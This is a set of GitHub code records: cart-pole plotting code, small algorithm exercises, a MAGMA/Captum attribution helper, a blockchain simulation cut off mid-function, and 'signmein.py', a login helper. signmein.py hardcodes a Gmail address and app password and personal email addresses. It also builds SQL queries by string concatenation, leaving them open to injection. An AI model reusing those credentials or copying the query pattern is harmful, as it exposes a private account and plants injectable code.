e_mean_keedmd[ii,:], linewidth=2, label='KEEDMD',color='tab:orange')\n fill_between(t_pred, e_mean_keedmd[ii,:]- e_std_keedmd[ii, :], e_mean_keedmd[ii,:] + e_std_keedmd[ii, :], alpha=0.2,color='tab:orange')\n\n ylabel(ylabels[ii])\n grid()\n if ii == 0:\n title('Mean open loop prediction error (+/- 1 std)')\n legend(fontsize=10, loc='upper left')\n ylim(-2., 2.)\n else:\n ylim(-4., 4.)\n\nxlabel('Time (sec)')\nax.yaxis.set_major_locator(MaxNLocator(integer=True))\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\ntight_layout()\nsavefig('core/examples/results/openloop_error.pdf', format='pdf', dpi=2400)\n\n# Plot the closed loop trajectory:\nylabels = ['$x$', '$\\\\theta$']\nbx = figure(figsize=(6,5)).gca()\nfor ii in range(2):\n subplot(2, 1, ii+1)\n plot(t_pred, qd_mpc[ii,:], linestyle=\"--\",linewidth=2, label='Reference')\n plot(t_pred, xs_nom_mpc[ii, :], linewidth=2, label='Nominal', color='tab:gray')\n plot(t_pred, xs_edmd_mpc[ii,:], linewidth=2, label='EDMD', color='tab:green')\n plot(t_pred, xs_keedmd_mpc[ii,:], linewidth=2, label='KEEDMD',color='tab:orange')\n ylabel(ylabels[ii])\n grid()\n if ii == 0:\n title('Closed loop trajectory tracking with MPC')\n legend(fontsize=10, loc='lower left')\nxlabel('Time (sec)')\nbx.yaxis.set_major_locator(MaxNLocator(integer=True))\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\ntight_layout()\nsavefig('core/examples/results/closedloop.pdf', format='pdf', dpi=2400)\nshow()\n","repo_name":"Cafolkes/keedmd","sub_path":"core/examples/cart_pole.py","file_name":"cart_pole.py","file_ext":"py","file_size_in_byte":23256,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"43654560904","text":"def flipColumn(arr, col):\n n = len(arr)\n\n for i in range(n):\n if arr[i][col] == 1:\n 
arr[i][col] = 0\n        else:\n            arr[i][col] = 1\n\n\ndef solution(beginning, target):\n    answer = float(\"inf\")\n    rows = len(beginning)\n    cols = len(beginning[0])\n\n    flipped = []\n    # pre-compute a fully flipped copy of the original array\n    for i in range(rows):\n        flipped.append([])\n        for j in range(cols):\n            if beginning[i][j]:\n                flipped[i].append(0)\n            else:\n                flipped[i].append(1)\n\n    # iterate over every bitmask of row flips\n    for unit in range(1 << rows):\n        rowFlipped = []\n        flipCnt = 0\n        for i in range(rows):\n            # build the bit to test: 001, 010, 100, ...\n            comp = 1 << i\n\n            # if the AND is nonzero, take the flipped version of this row\n            if unit & comp:\n                rowFlipped.append(flipped[i][:])\n                flipCnt += 1\n            # otherwise keep the row as-is\n            else:\n                rowFlipped.append(beginning[i][:])\n\n        # flip columns as needed\n        for j in range(cols):\n            curCol = []\n            targetCol = []\n\n            for i in range(rows):\n                curCol.append(rowFlipped[i][j])\n                targetCol.append(target[i][j])\n\n            # if the current column differs from the target column, flip it\n            if curCol != targetCol:\n                flipColumn(rowFlipped, j)\n                flipCnt += 1\n\n        # if the flipped result equals the target, update the minimum flip count\n        if rowFlipped == target:\n            answer = min(answer, flipCnt)\n\n    if answer == float(\"inf\"):\n        answer = -1\n\n    return answer","repo_name":"SeongJaeBae/algorithm","sub_path":"프로그래머스/lv3/131703. 2차원 동전 뒤집기/2차원 동전 뒤집기.py","file_name":"2차원 동전 뒤집기.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"70194762348","text":"# push X: push the integer X onto the stack.\n# pop: remove the integer on top of the stack and print it. If the stack is empty, print -1.\n# size: print the number of integers currently in the stack.\n# empty: print 1 if the stack is empty, 0 otherwise.\n# top: print the integer on top of the stack. If the stack is empty, print -1.\n\ndef do(st, com):\n    if com[0] == \"push\":\n        st.append(com[1])\n    elif com[0] == \"pop\":\n        if st:\n            print(st.pop())\n        else:\n            print(-1)\n    elif com[0] == \"size\":\n        print(len(st))\n    elif com[0] == \"empty\":\n        if st:\n            print(0)\n        else:\n            print(1)\n    elif com[0] == \"top\":\n        if st:\n            print(st[len(st) - 1])\n        else:\n            print(-1)\nn = int(input())\nst = []\nfor i in range(n):\n    command = list(input().split())\n    do(st, command)\n","repo_name":"Eilhwan/algorithms","sub_path":"oldOnes/python/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"14239357179","text":"# -*- coding: utf-8 -*-\nfrom directory import directory\nglobal signmein\nimport sqlite3\nimport smtplib\nimport random as rand\nconnection = sqlite3.connect(\"mesburgers1.db\")\nglobal crsr\n\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\ncrsr = connection.cursor()\n# force_to_unicode is called below but never defined or imported in this file;\n# it is assumed to be provided elsewhere in the project.\nclass signmeinpage(directory):\n    def __init__(self,query_components):\n        print(\"sign me in\",query_components[\"email\"])\n        if query_components.get(\"email\"):\n            print(\"data_string = query_components[\\\"email\\\"][0]\")\n            data_string = query_components[\"email\"][0]\n            print(\"crsr.execute(\\\"SELECT * FROM users where email = '\\\"+data_string+\\\"'\\\")\")\n            crsr.execute(\"SELECT * FROM users where email = '\"+data_string+\"'\")\n
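            # Note: building SQL by string concatenation (as in this file) is vulnerable to SQL\n            # injection; a safer sketch using sqlite3's parameter binding would be:\n            #   crsr.execute(\"SELECT * FROM users WHERE email = ?\", (data_string,))\n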
            mycontent=\"\"\n            # store all the fetched data in the ans variable\n            connection.commit()\n            ans = crsr.fetchall()\n            if len(ans) == 0:\n                print(\"no user\")\n            else:\n                crsr.execute(\"SELECT * FROM users where email = '\"+data_string+\"'\")\n                connection.commit()\n                user = crsr.fetchall()\n                user_number=user[0][0]\n                print(\"envoyer le code bk\")\n                print(user[0])\n                print(user[0][0])\n                self.set_userid(user[0][0])\n                bkcode=rand.randint(100000,999999)\n                crsr.execute(\"UPDATE users SET code = '\" + str(bkcode) + \"' WHERE email = '\"+data_string+\"'\")\n                connection.commit()\n\n\n                # SMTP configuration | set up here to work with Gmail\n                host_smtp = \"smtp.gmail.com\"\n                port_smtp = 587\n                email_smtp = \"mary.goudon@gmail.com\" # My Gmail address\n                mdp_smtp = \"eljlkuznppklsquw\" # My password\n\n                # Email configuration\n                prenom = \"cleo jeanne\"\n                print(prenom)\n                print(\"prenom\")\n                mail_content = force_to_unicode(\"Prêt pour les hamburgers ? !\nVous trouverez ci-dessous le code de connexion sécurisé que vous avez demandé pour vous connecter à Burger King. Entrez simplement ceci dans l'application et nous vous connecterons immédiatement.\n \") + force_to_unicode(str(bkcode))\n                print(\"mail_content\")\n                email_destinataire = \"cleo.ordioni@gmail.com\"\n                print(email_destinataire)\n                formule_p = force_to_unicode(str(bkcode))+\" est votre code de connexion de burger king\"\n                print(formule_p)\n                msg = MIMEMultipart()\n                print(\"from\")\n                msg['From'] = email_smtp\n                print(\"to\")\n                msg['To'] = email_destinataire\n                print(\"subject\")\n                msg['Subject'] = formule_p\n                print(\"formule\")\n                try:\n                    msg.attach(MIMEText(mail_content.decode('utf-8')))\n                except UnicodeEncodeError as e:\n                    print(type(e))\n                    print('gerer cette erreur')\n                    msg.attach(MIMEText(mail_content.encode('utf-8')))\n                except UnicodeDecodeError as e:\n                    print(type(e))\n                    print('gerer cette erreur')\n                    msg.attach(MIMEText(mail_content))\n                print(\"creation mail\")\n                # Create the mail object\n                mail = smtplib.SMTP(host_smtp, port_smtp) # this configuration works for Gmail\n                mail.ehlo() # extended SMTP (ESMTP) handshake\n                mail.starttls() # switch the connection to TLS encryption\n                mail.login(email_smtp, mdp_smtp)\n                mail.sendmail(email_smtp, email_destinataire, msg.as_string())\n                mail.close()\n\n                #confirmotp(force_to_unicode(data_string))\n                self.set_redirect(\"/signinuser?user_number=\" + str(user_number)+\"&bkcode=\"+str(bkcode))\n\n        self.set_json(None)\n        self.set_mimetype(None)\n","repo_name":"maridasi47500/bk_python","sub_path":"signmein.py","file_name":"signmein.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40172482343","text":"import torch\r\nimport torch.nn as nn\r\n\r\nimport os\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport cv2\r\n\r\nimport pandas as pd\r\nfrom typing import Callable\r\n\r\nfrom .utils import split_str_into_tokens\r\n\r\nclass CaptumMagma(nn.Module):\r\n    \"\"\"\r\n    Wrapper that makes a MAGMA model usable with Captum attribution tools.\r\n    \"\"\"\r\n    def __init__(\r\n        self,\r\n        magma,\r\n        mode='image',\r\n        text_prompt = 'This is a picture of a',\r\n        target_token_indices = [-1]\r\n    ):\r\n        super().__init__()\r\n\r\n        self.valid_modes = ['image', 'text']\r\n        assert mode in self.valid_modes, f'Expected mode: {mode} to be one of: {self.valid_modes}'\r\n        self.mode = mode\r\n\r\n        self.magma = magma\r\n        self.text_prompt = text_prompt\r\n        self.target_token_indices = target_token_indices\r\n\r\n    def get_logits(self, embeddings, target_token_indices = None):\r\n        if target_token_indices is None:\r\n            target_token_indices = self.target_token_indices\r\n\r\n\r\n        logits = self.magma.lm(\r\n            inputs_embeds=embeddings,\r\n            labels=None,\r\n            output_hidden_states=False,\r\n        ).logits\r\n\r\n        return logits[:, target_token_indices,:] ## returns logits for completion tokens\r\n\r\n    def embed_text(self, text):\r\n        embeddings = self.magma.embed(\r\n            [\r\n                self.magma.tokenizer.encode(text, return_tensors = 'pt')\r\n            ]\r\n        )\r\n        return embeddings\r\n\r\n    def 
forward_image(self, image_tensor):\r\n\r\n ## if batch size is more than 1 (IntegratedGradients), then handle things differently\r\n if image_tensor.shape[0] > 1:\r\n embeddings = []\r\n\r\n for x in image_tensor:\r\n single_embedding_batch_item = self.magma.embed(\r\n [\r\n x.unsqueeze(0),\r\n self.magma.tokenizer.encode(self.text_prompt, return_tensors=\"pt\")\r\n ]\r\n )\r\n embeddings.append(single_embedding_batch_item)\r\n embeddings = torch.cat(embeddings, dim = 0)\r\n else:\r\n embeddings = self.magma.embed(\r\n [\r\n image_tensor,\r\n self.magma.tokenizer.encode(self.text_prompt, return_tensors=\"pt\")\r\n ]\r\n )\r\n\r\n logits = self.get_logits(embeddings = embeddings, target_token_indices = self.target_token_indices)\r\n # assert logits.shape[0] == 1, 'Expected batch size to be 1'\r\n # embeddings.shape: [1, seq, 4096]\r\n return logits[:,-1,:]\r\n\r\n def __call__(self, x):\r\n if self.mode == 'image':\r\n return self.forward_image(x)\r\n else:\r\n return self.get_logits(embeddings = x, target_token_indices = self.target_token_indices)[:,-1,:] ## return only last seq item i.e \"next token\"\r\n\r\n def load_image_as_tensor(self, filename):\r\n assert os.path.exists(filename), f'Expected image: {filename} to exist :('\r\n input_image_tensor = self.magma.transforms(Image.open(filename))\r\n\r\n return input_image_tensor\r\n\r\ndef collect_attributions_on_a_single_item_text(\r\n cmagma: CaptumMagma,\r\n captum_tool,\r\n target: str,\r\n prompt: str,\r\n device: str = 'cuda:0',\r\n is_integrated_gradients = True ## true by default for convenience\r\n ):\r\n\r\n target_token_strings = split_str_into_tokens(tokenizer = cmagma.magma.tokenizer, x = target)\r\n\r\n results = []\r\n\r\n for i in range(len(target_token_strings)):\r\n target_token_str = target_token_strings[i]\r\n target_tokenized = cmagma.magma.tokenizer.encode(target_token_str)\r\n\r\n if i > 0:\r\n prompt += target_token_strings[i-1]\r\n\r\n assert len(target_tokenized) == 1\r\n target_token_id = target_tokenized[0]\r\n\r\n embeddings = cmagma.embed_text(prompt).to(device)\r\n\r\n if is_integrated_gradients == True:\r\n attribution = captum_tool.attribute(embeddings, target=target_token_id, n_steps = 10)\r\n else:\r\n attribution = captum_tool.attribute(embeddings, target=target_token_id)\r\n\r\n data = {\r\n 'attribution': attribution,\r\n 'target_token_str':target_token_str,\r\n 'target_token_id': target_token_id\r\n }\r\n results.append(data)\r\n\r\n return results\r\n\r\ndef collect_attributions_on_a_single_item(\r\n image_path: str,\r\n cmagma: CaptumMagma,\r\n captum_tool,\r\n target: str,\r\n text_prompt = 'This is a picture of a',\r\n is_integrated_gradients = True ## true by default for convenience\r\n ):\r\n cmagma.text_prompt = text_prompt\r\n\r\n image_tensor = cmagma.load_image_as_tensor(image_path)\r\n\r\n target_token_strings = split_str_into_tokens(tokenizer = cmagma.magma.tokenizer, x = target)\r\n\r\n results = []\r\n\r\n for i in range(len(target_token_strings)):\r\n target_token_str = target_token_strings[i]\r\n target_tokenized = cmagma.magma.tokenizer.encode(target_token_str)\r\n\r\n if i > 0:\r\n cmagma.text_prompt += target_token_strings[i-1]\r\n\r\n assert len(target_tokenized) == 1\r\n target_token_id = target_tokenized[0]\r\n if is_integrated_gradients == True:\r\n attribution = captum_tool.attribute(image_tensor, target=target_token_id, n_steps = 10)\r\n else:\r\n attribution = captum_tool.attribute(image_tensor, target=target_token_id)\r\n\r\n data = {\r\n 'attribution': attribution,\r\n 
'target_token_str':target_token_str,\r\n 'target_token_id': target_token_id\r\n }\r\n results.append(data)\r\n\r\n return results\r\n\r\n\r\ndef parse_results_over_all_tokens(results, square_outputs = True, divide_by_max = True):\r\n\r\n attributions = []\r\n\r\n for i in range(len(results)):\r\n attr = results[i]['attribution'].cpu().detach()[0].permute(1,2,0).mean(-1)\r\n if square_outputs is True:\r\n attr = attr**2\r\n if divide_by_max is True:\r\n attr = attr/attr.max()\r\n\r\n attributions.append(attr.numpy())\r\n\r\n return sum(attributions)/len(attributions)\r\n\r\n\r\ndef run_eval_with_captum_tool(\r\n cmagma,\r\n captum_tool,\r\n output_folder,\r\n metadata,\r\n dataloader,\r\n text_prompt=\"This is a picture of \", ## a or an is decided later\r\n use_lowercase_target=True,\r\n auto_decide_a_or_an=True,\r\n progress=False,\r\n square_outputs: bool = False,\r\n num_total_explanations=None,\r\n divide_by_max = False,\r\n is_integrated_gradients = True\r\n):\r\n\r\n if progress is True and num_total_explanations is not None:\r\n pbar = tqdm(total=num_total_explanations)\r\n\r\n \"\"\"\r\n ./result_folder\r\n - Cat\r\n - 1.jpg\r\n - 2.jpg\r\n - Dog\r\n - 1.jpg\r\n - 2.jpg\r\n \"\"\"\r\n\r\n ## append a space between last word and a/an\r\n if auto_decide_a_or_an == True:\r\n if text_prompt[-1] != \" \":\r\n text_prompt += \" \"\r\n\r\n classes = list(metadata.keys())\r\n\r\n d = dataloader\r\n\r\n if os.path.exists(output_folder) is False:\r\n print(f\"making output_folder: {output_folder}\")\r\n os.mkdir(output_folder)\r\n\r\n for i in range(len(classes)):\r\n output_class_dir = output_folder + \"/\" + classes[i]\r\n\r\n\r\n if os.path.exists(output_class_dir) is False:\r\n print(f\"making folder: {output_class_dir}\")\r\n os.mkdir(output_class_dir)\r\n\r\n\r\n for j in range(metadata[classes[i]][\"count\"]):\r\n\r\n filename = output_class_dir + f\"/{j+1}.npy\"\r\n\r\n if os.path.exists(filename):\r\n print(f\"{filename} already exists, skipping...\")\r\n if progress is True:\r\n pbar.update(1)\r\n continue\r\n\r\n try:\r\n data = d.fetch(i, j, center_crop=True, load_image = False)\r\n except:\r\n print(\r\n f\"an error occured while fetching from dataloader: class: {classes[i]} idx: {j+1}\"\r\n )\r\n if progress is True:\r\n pbar.update(1)\r\n continue\r\n\r\n\r\n if use_lowercase_target == True:\r\n target = f\" {data['label'].lower()}\"\r\n else:\r\n target = f\" {data['label']}\"\r\n\r\n results = collect_attributions_on_a_single_item(\r\n image_path = data['image_path'],\r\n cmagma = cmagma,\r\n captum_tool = captum_tool,\r\n target = target,\r\n text_prompt = text_prompt,\r\n is_integrated_gradients = is_integrated_gradients\r\n )\r\n\r\n ## heatmap_numpy is a numpy array with values between 0 and 1 if divide_by_max == True\r\n heatmap_numpy = parse_results_over_all_tokens(\r\n results = results,\r\n square_outputs=square_outputs,\r\n divide_by_max=divide_by_max\r\n )\r\n np.save(filename, heatmap_numpy)\r\n print(f'saved: {filename}')\r\n torch.cuda.empty_cache()\r\n if progress is True:\r\n pbar.update(1)\r\n\r\n if progress is True:\r\n pbar.close()\r\n print('complete!!')\r\n print(f'check:\\n{output_folder}')\r\n\r\n\r\ndef calculate_score_for_output_folder(\r\n output_folder: str,\r\n metadata,\r\n dataloader,\r\n output_csv_file: str,\r\n metric_fn: Callable,\r\n progress=True,\r\n num_total_explanations=None,\r\n mask_size = (384,384),\r\n):\r\n\r\n result_dict = {\r\n 'image_filename': [],\r\n 'mask_filename': [],\r\n 'explanation_filename': [],\r\n 'precision_score': 
[],\r\n        'label': [],\r\n    }\r\n\r\n    if progress is True and num_total_explanations is not None:\r\n        pbar = tqdm(total=num_total_explanations)\r\n\r\n    \"\"\"\r\n    ./result_folder\r\n        - Cat\r\n            - 1.jpg\r\n            - 2.jpg\r\n        - Dog\r\n            - 1.jpg\r\n            - 2.jpg\r\n    \"\"\"\r\n    classes = list(metadata.keys())\r\n\r\n    d = dataloader\r\n    for i in range(len(classes)):\r\n        output_class_dir = output_folder + \"/\" + classes[i]\r\n\r\n        for j in range(metadata[classes[i]][\"count\"]):\r\n\r\n            try:\r\n                data = d.fetch(i, j, center_crop=True, load_image = False)\r\n            except:\r\n                print(\r\n                    f\"an error occured while fetching from dataloader: class: {classes[i]} idx: {j+1}\"\r\n                )\r\n                if progress is True:\r\n                    pbar.update(1)\r\n                continue\r\n\r\n            explanation_path = output_class_dir + f\"/{j+1}.npy\"\r\n            mask_path = data['mask_path']\r\n            image_path = data['image_path']\r\n\r\n            assert os.path.exists(explanation_path), f'Expected explanation path: {explanation_path} to exist :('\r\n            explanation = np.array(np.load(explanation_path))\r\n            mask = np.array(Image.open(mask_path).resize(mask_size))/255.\r\n\r\n            score = metric_fn(x= explanation, y=mask)\r\n\r\n            result_dict['image_filename'].append(image_path)\r\n            result_dict['mask_filename'].append(mask_path)\r\n            result_dict['explanation_filename'].append(explanation_path)\r\n            result_dict['precision_score'].append(score)\r\n            result_dict['label'].append(data['label'])\r\n\r\n            if progress is True:\r\n                pbar.update(1)\r\n\r\n    df = pd.DataFrame(result_dict)\r\n    df.to_csv(output_csv_file)\r\n    print(f'saved: {output_csv_file}')\r\n\r\n    return df\r\n","repo_name":"Aleph-Alpha/AtMan","sub_path":"atman-magma/atman_magma/captum_helper.py","file_name":"captum_helper.py","file_ext":"py","file_size_in_byte":11513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"1281124235","text":"#Morguhn Burke\r\n#mcb196\r\n#4/18/2022\r\n#CS-4379-D Assignment 4\r\n\r\n#This assignment was coded by me using python in Microsoft visual studio code.\r\n#It is an event based simulation making use of a linked list implementation of a priority queue based on event arrival time (Node.py) (Line: 441)\r\n\r\n#This program generates events in two different stages, firstly, it determines if a new player/miner is to be added/removed\r\n#from the simulation based on a number created from a geometric distribution of probability 0.1 (Line: 234, 365, 431) \r\n#Then, if the current event time has surpassed the previous time + the next time generated by geometric distribution, a player/miner will be added/removed\r\n\r\n#Following this, any active players (Defined in Players.py) will have transaction events generated (Deposit, Withdrawal, Transfer, Hold) (Events.py)\r\n#After all the events are processed, they are assigned to the miner whose block they were assigned to in a Blockchain with a sha256 cryptographic hash (BlockChain.py)\r\n\r\n\r\nimport time\r\nimport random\r\nimport csv\r\nimport pandas as pd\r\nimport numpy as np\r\nimport Players as P\r\nimport BlockChain as BC\r\nimport Node as N\r\nimport Events as ev\r\n\r\n\r\nplayerList = []\r\n\r\nclass Miner(P.Players):\r\n    def __init__(self, name):\r\n        self.name = name\r\n        self.head = None\r\n        self.role = \"Miner\"\r\n        self.playersAdded = False\r\n        self.numPlayersAdded = 0\r\n        self.addedPlayers = []\r\n        self.nodeData = []\r\n        self.requestStatus = []\r\n        self.blockChain = None\r\n        self.chainDelta = 0\r\n    \r\n    def writeEvents(events, MasterPlayerList, MasterMinerList):\r\n        #Name ActionCode PaymentMethod PaymentAmount 
(TransferTarget IF Transfer)\r\n newEventList = []\r\n for evt in events:\r\n try:\r\n player = evt.player\r\n event = \" \"\r\n if evt.actionCode == 9:\r\n print(\"Standard Error: \" + str(player.name) + \" was not assigned an action code. Player forced to Hold\")\r\n evt.actionCode = 3\r\n event = (str(player.name) + \" \" + str(evt.actionCode))\r\n elif evt.actionCode == 0: #Deposit Deposits go to E\r\n event = (str(player.name) + \" \" + str(evt.actionCode) + \" \" + str(evt.paymentMethod) + \" \" + str(evt.paymentAmt) + \" \" + str(evt.minerTarget) + \" \" + str(evt.arrivalTime))\r\n elif evt.actionCode == 1: #Withdrawl from E\r\n event = (str(player.name) + \" \" + str(evt.actionCode) + \" \" + str(evt.paymentMethod) + \" \" + str(evt.withdrawlAmt) + \" \" + str(evt.minerTarget)+ \" \" + str(evt.arrivalTime))\r\n elif evt.actionCode == 2: #Transfer funds to player\r\n event = (str(player.name) + \" \" + str(evt.actionCode) + \" \" + str(evt.paymentMethod) + \" \" + str(evt.transferAmt) + \" \" + str(evt.transferTarget)+ \" \" + str(evt.arrivalTime))\r\n\r\n newEventList.append(event)\r\n \r\n except AttributeError:\r\n None\r\n \r\n newEventList = list(filter((' ').__ne__, newEventList))\r\n newEventList = list(filter(('').__ne__, newEventList))\r\n \r\n return newEventList\r\n \r\n def removeDuplicates(input):\r\n res = []\r\n [res.append(x) for x in input if x not in res]\r\n return res\r\n \r\n def getCurrPlayer(name, playerList):\r\n for player in playerList:\r\n if name == player.name:\r\n currPlayer = player\r\n try: \r\n return currPlayer\r\n except UnboundLocalError:\r\n print(\"Event Error Occured, player: \" + str(name))\r\n return A\r\n \r\n def getMinerTarget(n, minerList):\r\n for miner in minerList:\r\n if miner.name == n:\r\n return miner\r\n \r\n return E\r\n \r\n def executeEvents(playerList, minerList, eventQueue):\r\n \r\n print(\"executing\")\r\n currEvent = eventQueue\r\n while currEvent.next != None:\r\n event = currEvent.data\r\n event = event.split(' ')\r\n if event[1] == '0':\r\n Miner.handleDeposit(currEvent, minerList)\r\n elif event[1] == '1':\r\n Miner.handleWithdrawl(currEvent, minerList)\r\n elif event[1] == '2':\r\n Miner.handleTransfer(currEvent, playerList)\r\n else:\r\n print(\"There was an unknown error with an event: \")\r\n print(event)\r\n currEvent = currEvent.next\r\n \r\n def handleDeposit(event, minerList):\r\n \r\n acceptedTransaction = True\r\n event = event.data\r\n event = event.split(' ')\r\n currPlayer = Miner.getCurrPlayer(event[0], playerList)\r\n paymentMethod = event[2]\r\n paymentAmt = int(event[3])\r\n currMiner = Miner.getMinerTarget(event[4], minerList)\r\n \r\n if paymentMethod == \"Account\":\r\n if currPlayer.acctBal - paymentAmt >= 0:\r\n string = \"Account Deposit approved from \" + str(currPlayer.name) + \" in the amount of: \" + str(paymentAmt)\r\n currPlayer.acctBal -= paymentAmt\r\n currPlayer.chainBalance += paymentAmt\r\n currPlayer.approvedCnt += 1\r\n currMiner.chainDelta += paymentAmt\r\n else:\r\n string = \"Account Deposit Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n if paymentMethod == \"Credit\":\r\n if currPlayer.creditBalance + paymentAmt <= currPlayer.creditLimit:\r\n string = \"Credit Deposit approved from \" + str(currPlayer.name) + \" in the amount of: \" + str(paymentAmt)\r\n currPlayer.creditBalance -= paymentAmt\r\n currPlayer.chainBalance += paymentAmt\r\n currPlayer.approvedCnt += 1\r\n currMiner.chainDelta 
+= paymentAmt\r\n \r\n else:\r\n string = \"Credit Deposit Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n Miner.updateStatus(event, string, currMiner, acceptedTransaction)\r\n \r\n def handleWithdrawl(event, minerList):\r\n \r\n acceptedTransaction = True\r\n event = event.data\r\n event = event.split(' ')\r\n currPlayer = Miner.getCurrPlayer(event[0], playerList)\r\n paymentMethod = event[2]\r\n paymentAmt = int(event[3])\r\n currMiner = Miner.getMinerTarget(event[4], minerList)\r\n \r\n if paymentAmt == 0:\r\n string = \"Account Withdrawl Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n else:\r\n if paymentMethod == \"Account\":\r\n if currPlayer.chainBalance - paymentAmt >= 0:\r\n string = \"Account Withdrawl approved from \" + str(currPlayer.name) + \" in the amount of: \" + str(paymentAmt)\r\n currPlayer.acctBal += paymentAmt\r\n currPlayer.approvedCnt += 1\r\n currPlayer.chainBalance -= paymentAmt\r\n currMiner.chainDelta -= paymentAmt\r\n else:\r\n string = \"Account Withdrawl Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n if paymentMethod == \"Credit\":\r\n if currPlayer.chainBalance - paymentAmt >= 0:\r\n string = \"Credit Withdrawl approved from \" + str(currPlayer.name) + \" in the amount of: \" + str(paymentAmt)\r\n currPlayer.approvedCnt += 1\r\n currPlayer.chainBalance -= paymentAmt\r\n currMiner.chainDelta -= paymentAmt \r\n currPlayer.creditBalance -= paymentAmt\r\n if currPlayer.creditBalance< 0: #if credit balance goes negative, add the remainder to account\r\n leftovers = abs(currPlayer.creditBalance)\r\n currPlayer.creditBalance += leftovers\r\n currPlayer.acctBal += leftovers\r\n else:\r\n string = \"Account Withdrawl Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n Miner.updateStatus(event, string, currMiner, acceptedTransaction)\r\n \r\n def handleTransfer(event, playerList):\r\n acceptedTransaction = True\r\n event = event.data\r\n event = event.split(' ')\r\n currPlayer = Miner.getCurrPlayer(event[0], playerList)\r\n paymentMethod = event[2]\r\n transferAmt = int(event[3])\r\n transferTarget = Miner.getCurrPlayer(event[4], playerList)\r\n \r\n if paymentMethod == \"Account\":\r\n if currPlayer.acctBal - transferAmt >= 0:\r\n string = \"Account Transfer Between \" + str(currPlayer.name) + \" and \" + str(transferTarget.name) + \" was Approved: \" + str(currPlayer.transferAmt)\r\n currPlayer.acctBal -= transferAmt\r\n transferTarget.acctBal += transferAmt\r\n currPlayer.approvedCnt += 1\r\n else:\r\n string = \"Account Transfer Between \" + str(currPlayer.name) + \" and \" + str(transferTarget.name) + \" was Denied\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n if paymentMethod == \"Credit\":\r\n if currPlayer.creditBalance + transferAmt <= currPlayer.creditLimit:\r\n string = \"Credit Transfer Between \" + str(currPlayer.name) + \" and \" + str(transferTarget.name) + \" was Approved: \" + str(transferAmt)\r\n currPlayer.creditBalance += transferAmt\r\n transferTarget.acctBal += transferAmt\r\n currPlayer.approvedCnt += 1\r\n else:\r\n string = \"Credit Transfer Between \" + str(currPlayer.name) + \" and \" + str(transferTarget.name) + \" was Denied\"\r\n acceptedTransaction = False\r\n 
currPlayer.deniedCnt += 1\r\n        \r\n        Miner.updateStatus(event, string, E, acceptedTransaction)\r\n    \r\n    def updateStatus(currEvent, string, currMiner, acceptedTransaction):\r\n        if(acceptedTransaction):\r\n            if currEvent not in currMiner.nodeData:\r\n                currMiner.nodeData.append(currEvent)\r\n        \r\n        if string not in E.requestStatus:\r\n            E.requestStatus.append(string)    \r\n    \r\n    def getEventTime():\r\n        time = np.random.geometric(p=0.1, size = 1)\r\n        time = time/1000\r\n        return time\r\n    \r\n    def getRole():\r\n        role = np.random.choice([\"Player\", \"Miner\"], replace = False, p = [0.5, 0.5])\r\n        return role\r\n    \r\n    def rollName(nameOptions):\r\n        name = np.random.choice([\"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"])\r\n        return name\r\n    \r\n    def pickPlayerToRemove():\r\n        toRemove = random.choice(E.addedPlayers)\r\n\r\n        return toRemove\r\n    \r\n    def removeFromList(player, playerList):\r\n        for item in playerList:\r\n            if player.name == item.name:\r\n                playerList.remove(item)\r\n        return playerList\r\n    \r\n    def getBlockClusterssss(miner):\r\n        nodeData = miner.nodeData\r\n        miner.nodeData = []\r\n        cluster = []\r\n        i = 0\r\n        clusterSize = random.randint(1,6) #maximum of 6 items per block\r\n        while i < len(nodeData):\r\n            if i == clusterSize:\r\n                clusterSize += random.randint(1,7) #note: randint is inclusive of the upper bound\r\n                miner.nodeData.append(cluster)\r\n                cluster = []\r\n            else:\r\n                cluster.append(nodeData[i])\r\n                i += 1\r\n    \r\n    def getBlockClusters(miner):\r\n        nodeData = miner.nodeData\r\n        miner.nodeData = []\r\n        cluster = []\r\n        addedToCluster = []\r\n        skipped = []\r\n        i = 0\r\n        clusterSize = random.randint(1,7) #up to 7 items per block (randint is inclusive of the upper bound)\r\n        while i < len(nodeData):\r\n            if i == clusterSize:\r\n                clusterSize += random.randint(1,7) #note: randint is inclusive of the upper bound\r\n                miner.nodeData.append(cluster)\r\n                cluster = []\r\n                addedToCluster = []\r\n            else:\r\n                if nodeData[i][0] not in addedToCluster:\r\n                    cluster.append(nodeData[i])\r\n                    addedToCluster.append(nodeData[i][0])\r\n                else:\r\n                    skipped.append(nodeData[i])\r\n                i += 1\r\n        \r\n        while len(skipped) > 0:\r\n            i = 0\r\n            if len(skipped) == 1:\r\n                nodeData.append(skipped[0])\r\n                skipped.pop(i)\r\n                break\r\n            clusterSize = random.randint(1,7)\r\n            while i < len(skipped):\r\n                if 